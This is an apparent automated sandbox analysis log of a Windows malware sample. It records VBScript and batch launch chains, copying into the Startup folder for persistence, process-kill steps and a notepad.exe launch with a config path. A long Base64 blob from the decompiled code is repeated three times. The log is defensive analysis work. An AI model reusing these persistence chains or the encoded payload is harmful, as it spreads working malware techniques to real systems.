Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killstatrup.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\deltemp.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\start.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\services.exe services.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe AudioClip.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\start.vbs"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\Replace32640.vbs"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\mavis9080.vbe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe wininit.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe"
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe \Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe wininit.exe
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe \Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\notepad.exe C:\Windows\notepad.exe" -c "C:\ProgramData\eWTBqYYAek\cfg
Source: C:\Users\user\Desktop\2rVBokoc2C.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\install.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\del.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TASKKILL /IM wscript.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\delreg.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killroaming.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\killstatrup.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\deltemp.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\start.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\services.exe services.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe AudioClip.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\Replace32640.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\01Atodo\mavis9080.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe \Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" "
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe \Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\01Atodo\start.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe wininit.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	Process created: C:\Windows\notepad.exe C:\Windows\notepad.exe" -c "C:\ProgramData\eWTBqYYAek\cfg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\01Atodo\wininit.exe wininit.exe

Source: C:\Users\user\Desktop\2rVBokoc2C.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "wscript.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "wscript.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "wscript.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "wscript.exe")
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "wscript.exe")

Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\01Atodo\services.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Roaming\01Atodo\AudioClip.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AudioClip.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll

Source: AudioClip.exe.0.dr, Program.cs	Base64 encoded string: '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
Source: AudioClip.exe.22.dr, Program.cs	Base64 encoded string: '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
Source: 22.2.AudioClip.exe.df0000.0.unpack, Program.cs	Base64 encoded string: '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
